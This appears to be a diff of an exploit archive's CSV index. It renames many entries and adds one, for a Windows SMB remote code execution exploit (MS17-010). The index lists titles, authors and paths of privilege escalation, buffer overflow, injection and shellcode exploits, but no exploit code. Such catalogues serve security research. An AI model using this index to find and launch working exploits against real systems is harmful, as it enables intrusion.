20720,platforms/linux/local/20720.c,"Linux Kernel 2.2.18 (RedHat 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
|
20720,platforms/linux/local/20720.c,"Linux Kernel 2.2.18 (RedHat 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
|
||||||
20721,platforms/linux/local/20721.c,"Linux Kernel 2.2.18 (RedHat 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2)",2001-03-27,"Wojciech Purczynski",linux,local,0
|
20721,platforms/linux/local/20721.c,"Linux Kernel 2.2.18 (RedHat 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2)",2001-03-27,"Wojciech Purczynski",linux,local,0
|
||||||
40425,platforms/windows/local/40425.txt,"Elantech-Smart Pad 11.9.0.0 - Unquoted Service Path Privilege Escalation",2016-09-26,zaeek,windows,local,0
|
40425,platforms/windows/local/40425.txt,"Elantech-Smart Pad 11.9.0.0 - Unquoted Service Path Privilege Escalation",2016-09-26,zaeek,windows,local,0
|
||||||
20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 Beta - Arbitrary Local File Disclosure",2001-03-30,"Dixie Flatline",hp-ux,local,0
|
20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 Beta - Arbitrary Local File Disclosure",2001-03-30,"Dixie Flatline",hp-ux,local,0
|
||||||
20740,platforms/solaris/local/20740.c,"Solaris 7/8 kcms_configure - Command-Line Buffer Overflow (1)",2001-04-09,"Riley Hassell",solaris,local,0
|
20740,platforms/solaris/local/20740.c,"Solaris 7/8 kcms_configure - Command-Line Buffer Overflow (1)",2001-04-09,"Riley Hassell",solaris,local,0
|
||||||
|
@ -7876,7 +7877,7 @@ id,file,description,date,author,platform,type,port
|
||||||
22645,platforms/linux/local/22645.c,"Ifenslave 0.0.7 - Argument Local Buffer Overflow (3)",2003-05-26,"Julien L",linux,local,0
|
22645,platforms/linux/local/22645.c,"Ifenslave 0.0.7 - Argument Local Buffer Overflow (3)",2003-05-26,"Julien L",linux,local,0
|
||||||
22652,platforms/windows/local/22652.py,"Zoner Photo Studio 15 Build 3 - 'Zps.exe' Registry Value Parsing Exploit",2012-11-12,"Julien Ahrens",windows,local,0
|
22652,platforms/windows/local/22652.py,"Zoner Photo Studio 15 Build 3 - 'Zps.exe' Registry Value Parsing Exploit",2012-11-12,"Julien Ahrens",windows,local,0
|
||||||
22661,platforms/freebsd/local/22661.c,"Upclient 5.0 b7 - Command Line Argument Buffer Overflow",2003-05-27,"Gino Thomas",freebsd,local,0
|
22661,platforms/freebsd/local/22661.c,"Upclient 5.0 b7 - Command Line Argument Buffer Overflow",2003-05-27,"Gino Thomas",freebsd,local,0
|
||||||
22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0
|
22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP) (PoC)",2012-11-13,ZadYree,linux,local,0
|
||||||
22695,platforms/linux/local/22695.pl,"RedHat 9.0 / Slackware 8.1 - /bin/mail Carbon Copy Field Buffer Overrun",2003-05-30,mark@vulndev.org,linux,local,0
|
22695,platforms/linux/local/22695.pl,"RedHat 9.0 / Slackware 8.1 - /bin/mail Carbon Copy Field Buffer Overrun",2003-05-30,mark@vulndev.org,linux,local,0
|
||||||
22703,platforms/linux/local/22703.c,"XMame 0.6x - Lang Local Buffer Overflow",2003-03-31,"Gabriel A. Maggiotti",linux,local,0
|
22703,platforms/linux/local/22703.c,"XMame 0.6x - Lang Local Buffer Overflow",2003-03-31,"Gabriel A. Maggiotti",linux,local,0
|
||||||
22719,platforms/linux/local/22719.pl,"kon2 - Local Buffer Overflow (1)",2003-06-03,wsxz,linux,local,0
|
22719,platforms/linux/local/22719.pl,"kon2 - Local Buffer Overflow (1)",2003-06-03,wsxz,linux,local,0
|
||||||
|
@ -8431,7 +8432,7 @@ id,file,description,date,author,platform,type,port
|
||||||
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
|
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
|
||||||
35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)",2014-10-28,Metasploit,windows,local,0
|
35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)",2014-10-28,Metasploit,windows,local,0
|
||||||
35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0
|
35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0
|
||||||
35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper.c' Privilege Escalation (2)",2012-01-12,zx2c4,linux,local,0
|
35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Privilege Escalation (2)",2012-01-12,zx2c4,linux,local,0
|
||||||
35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow (SEH)",2014-11-06,metacom,windows,local,0
|
35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow (SEH)",2014-11-06,metacom,windows,local,0
|
||||||
35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
|
35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
|
||||||
35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0
|
35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0
|
||||||
|
@ -9202,7 +9203,7 @@ id,file,description,date,author,platform,type,port
|
||||||
627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - (DELETE) Remote Stack Overflow",2004-11-12,Zatlander,windows,remote,143
|
627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - (DELETE) Remote Stack Overflow",2004-11-12,Zatlander,windows,remote,143
|
||||||
636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow (2)",2004-11-16,NoPh0BiA,windows,remote,80
|
636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow (2)",2004-11-16,NoPh0BiA,windows,remote,80
|
||||||
637,platforms/windows/remote/637.c,"TABS MailCarrier 2.51 - Remote Buffer Overflow",2004-11-16,NoPh0BiA,windows,remote,25
|
637,platforms/windows/remote/637.c,"TABS MailCarrier 2.51 - Remote Buffer Overflow",2004-11-16,NoPh0BiA,windows,remote,25
|
||||||
638,platforms/windows/remote/638.py,"Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Buffer Overflow",2004-11-18,muts,windows,remote,110
|
638,platforms/windows/remote/638.py,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)",2004-11-18,muts,windows,remote,110
|
||||||
640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0
|
640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0
|
||||||
641,platforms/windows/remote/641.txt,"Microsoft Internet Explorer 6.0 SP2 - File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0
|
641,platforms/windows/remote/641.txt,"Microsoft Internet Explorer 6.0 SP2 - File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0
|
||||||
644,platforms/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Buffer Overflow",2004-11-21,"Reed Arvin",windows,remote,110
|
644,platforms/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Buffer Overflow",2004-11-21,"Reed Arvin",windows,remote,110
|
||||||
|
@ -10800,7 +10801,7 @@ id,file,description,date,author,platform,type,port
|
||||||
16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)",2011-02-08,Metasploit,windows,remote,0
|
16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)",2011-02-08,Metasploit,windows,remote,0
|
||||||
16397,platforms/windows/remote/16397.rb,"Lyris ListManager - MSDE Weak sa Password (Metasploit)",2010-09-20,Metasploit,windows,remote,0
|
16397,platforms/windows/remote/16397.rb,"Lyris ListManager - MSDE Weak sa Password (Metasploit)",2010-09-20,Metasploit,windows,remote,0
|
||||||
16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server - Hello Overflow (MS02-056) (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server - Hello Overflow (MS02-056) (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
||||||
16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
||||||
16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote,0
|
16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote,0
|
||||||
16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve - Message Engine Heap Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve - Message Engine Heap Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
||||||
16402,platforms/windows/remote/16402.rb,"CA BrightStor - HSM Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
|
16402,platforms/windows/remote/16402.rb,"CA BrightStor - HSM Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
|
||||||
|
@ -11701,7 +11702,7 @@ id,file,description,date,author,platform,type,port
|
||||||
19672,platforms/solaris/remote/19672.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (4)",1999-12-10,"Cheez Whiz",solaris,remote,0
|
19672,platforms/solaris/remote/19672.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (4)",1999-12-10,"Cheez Whiz",solaris,remote,0
|
||||||
19679,platforms/windows/remote/19679.txt,"Infoseek Ultraseek 2.1/3.1 for NT - GET Buffer Overflow",1999-12-15,"Ussr Labs",windows,remote,0
|
19679,platforms/windows/remote/19679.txt,"Infoseek Ultraseek 2.1/3.1 for NT - GET Buffer Overflow",1999-12-15,"Ussr Labs",windows,remote,0
|
||||||
19680,platforms/sco/remote/19680.c,"SCO Unixware 7.1 - i2odialogd Remote Buffer Overflow",1999-12-22,"Brock Tellier",sco,remote,0
|
19680,platforms/sco/remote/19680.c,"SCO Unixware 7.1 - i2odialogd Remote Buffer Overflow",1999-12-22,"Brock Tellier",sco,remote,0
|
||||||
19682,platforms/novell/remote/19682.txt,"Netscape Enterprise Server_ Novell Groupwise 5.2/5.5 GWWEB.EXE - Multiple Vulnerabilities",1999-12-19,"Sacha Faust Bourque",novell,remote,0
|
19682,platforms/novell/remote/19682.txt,"Netscape Enterprise Server / Novell Groupwise 5.2/5.5 GWWEB.EXE - Multiple Vulnerabilities",1999-12-19,"Sacha Faust Bourque",novell,remote,0
|
||||||
19686,platforms/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 - external.NavigateAndFind() Cross-Frame",1999-12-22,"Georgi Guninski",multiple,remote,0
|
19686,platforms/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 - external.NavigateAndFind() Cross-Frame",1999-12-22,"Georgi Guninski",multiple,remote,0
|
||||||
19688,platforms/windows/remote/19688.txt,"ZBServer Pro 1.5 - Buffer Overflow (1)",1999-12-23,"Ussr Labs",windows,remote,0
|
19688,platforms/windows/remote/19688.txt,"ZBServer Pro 1.5 - Buffer Overflow (1)",1999-12-23,"Ussr Labs",windows,remote,0
|
||||||
19689,platforms/windows/remote/19689.c,"ZBServer Pro 1.5 - Buffer Overflow (2)",1999-12-23,Izan,windows,remote,0
|
19689,platforms/windows/remote/19689.c,"ZBServer Pro 1.5 - Buffer Overflow (2)",1999-12-23,Izan,windows,remote,0
|
||||||
|
@ -13375,8 +13376,8 @@ id,file,description,date,author,platform,type,port
|
||||||
24937,platforms/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0
|
24937,platforms/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0
|
||||||
24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10 SP3 / 11 SP2 - Remote Execution (Metasploit)",2013-04-08,Metasploit,multiple,remote,0
|
24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10 SP3 / 11 SP2 - Remote Execution (Metasploit)",2013-04-08,Metasploit,multiple,remote,0
|
||||||
24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption Buffer Overflow",2013-04-12,Wireghoul,windows,remote,0
|
24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption Buffer Overflow",2013-04-12,Wireghoul,windows,remote,0
|
||||||
643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Remote Buffer Overflow",2004-12-21,"Haroon Rashid Astwat",windows,remote,0
|
643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)",2004-12-21,"Haroon Rashid Astwat",windows,remote,110
|
||||||
646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLMail) 5.5 - Remote Buffer Overflow",2004-12-22,"Ivan Ivanovic",windows,remote,0
|
646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)",2004-12-22,"Ivan Ivanovic",windows,remote,0
|
||||||
24944,platforms/windows/remote/24944.py,"Freefloat FTP Server 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0
|
24944,platforms/windows/remote/24944.py,"Freefloat FTP Server 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0
|
||||||
24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0
|
24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0
|
||||||
24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit (Metasploit)",2013-04-10,Metasploit,multiple,remote,0
|
24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit (Metasploit)",2013-04-10,Metasploit,multiple,remote,0
|
||||||
|
@ -15392,7 +15393,7 @@ id,file,description,date,author,platform,type,port
|
||||||
40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0
|
40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0
|
||||||
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
|
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
|
||||||
40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0
|
40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0
|
||||||
40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8/9/10/11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
|
40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8/9/10/11 / IIS / CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
|
||||||
40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
|
40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
|
||||||
40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
|
40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
|
||||||
40735,platforms/hardware/remote/40735.txt,"D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
|
40735,platforms/hardware/remote/40735.txt,"D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
|
||||||
|
@ -15466,6 +15467,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
|
41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
|
||||||
41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
|
41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
|
||||||
41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
|
41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
|
||||||
|
41987,platforms/windows/remote/41987.c,"Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
|
||||||
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
|
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
|
||||||
41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
|
41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
|
||||||
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0
|
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0
|
||||||
|
@ -15491,7 +15493,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41935,platforms/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80
|
41935,platforms/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80
|
||||||
41942,platforms/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,python,remote,22
|
41942,platforms/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,python,remote,22
|
||||||
41964,platforms/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo and niklasb",macos,remote,0
|
41964,platforms/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo and niklasb",macos,remote,0
|
||||||
41975,platforms/windows/remote/41975.txt,"Microsoft Windows 8 / 8.1 / 10 / Windows Server / SCEP_ Microsoft Security Essentials - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0
|
41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0
|
||||||
41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0
|
41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0
|
||||||
41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80
|
41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80
|
||||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||||
|
@ -26290,7 +26292,7 @@ id,file,description,date,author,platform,type,port
|
||||||
21995,platforms/cgi/webapps/21995.txt,"CuteCast 1.2 - User Credential Disclosure",2002-11-07,Zero-X,cgi,webapps,0
|
21995,platforms/cgi/webapps/21995.txt,"CuteCast 1.2 - User Credential Disclosure",2002-11-07,Zero-X,cgi,webapps,0
|
||||||
22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - 'albums.php album Parameter' SQL Injection",2012-10-16,Zixem,php,webapps,0
|
22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - 'albums.php album Parameter' SQL Injection",2012-10-16,Zixem,php,webapps,0
|
||||||
22004,platforms/php/webapps/22004.txt,"Joomla! Component 'com_icagenda' - 'id' Parameter Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0
|
22004,platforms/php/webapps/22004.txt,"Joomla! Component 'com_icagenda' - 'id' Parameter Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0
|
||||||
22005,platforms/hardware/webapps/22005.txt,"visual tools dvr 3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0
|
22005,platforms/hardware/webapps/22005.txt,"Visual Tools DVR3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0
|
||||||
22009,platforms/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 - Information Disclosure",2002-11-11,"Tacettin Karadeniz",php,webapps,0
|
22009,platforms/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 - Information Disclosure",2002-11-11,"Tacettin Karadeniz",php,webapps,0
|
||||||
22015,platforms/cgi/webapps/22015.txt,"W3Mail 1.0.6 - File Disclosure",2002-11-12,"Tim Brown",cgi,webapps,0
|
22015,platforms/cgi/webapps/22015.txt,"W3Mail 1.0.6 - File Disclosure",2002-11-12,"Tim Brown",cgi,webapps,0
|
||||||
22017,platforms/php/webapps/22017.txt,"phpBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion",2002-11-13,"Hai Nam Luke",php,webapps,0
|
22017,platforms/php/webapps/22017.txt,"phpBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion",2002-11-13,"Hai Nam Luke",php,webapps,0
|
||||||
|
@ -27677,7 +27679,7 @@ id,file,description,date,author,platform,type,port
|
||||||
25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0
|
25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0
|
||||||
25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php' phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
|
25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php' phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
|
||||||
25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
|
25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
|
||||||
25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 - ENGLISH_poc.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
|
25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 - 'ENGLISH_poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
|
||||||
25230,platforms/php/webapps/25230.txt,"PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities",2005-03-16,"benji lemien",php,webapps,0
|
25230,platforms/php/webapps/25230.txt,"PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities",2005-03-16,"benji lemien",php,webapps,0
|
||||||
25232,platforms/php/webapps/25232.txt,"McNews 1.x - install.php Arbitrary File Inclusion",2005-03-17,"Jonathan Whiteley",php,webapps,0
|
25232,platforms/php/webapps/25232.txt,"McNews 1.x - install.php Arbitrary File Inclusion",2005-03-17,"Jonathan Whiteley",php,webapps,0
|
||||||
25233,platforms/asp/webapps/25233.txt,"ACS Blog 0.8/0.9/1.0/1.1 - search.asp Cross-Site Scripting",2005-03-17,"farhad koosha",asp,webapps,0
|
25233,platforms/asp/webapps/25233.txt,"ACS Blog 0.8/0.9/1.0/1.1 - search.asp Cross-Site Scripting",2005-03-17,"farhad koosha",asp,webapps,0
|
||||||
|
@ -30571,7 +30573,7 @@ id,file,description,date,author,platform,type,port
|
||||||
29093,platforms/asp/webapps/29093.txt,"Texas Rankem - 'selPlayer' Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
|
29093,platforms/asp/webapps/29093.txt,"Texas Rankem - 'selPlayer' Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
|
||||||
29094,platforms/asp/webapps/29094.txt,"Texas Rankem - 'tournament_id' Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
|
29094,platforms/asp/webapps/29094.txt,"Texas Rankem - 'tournament_id' Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
|
||||||
29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0
|
29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0
|
||||||
40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12 / CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||||
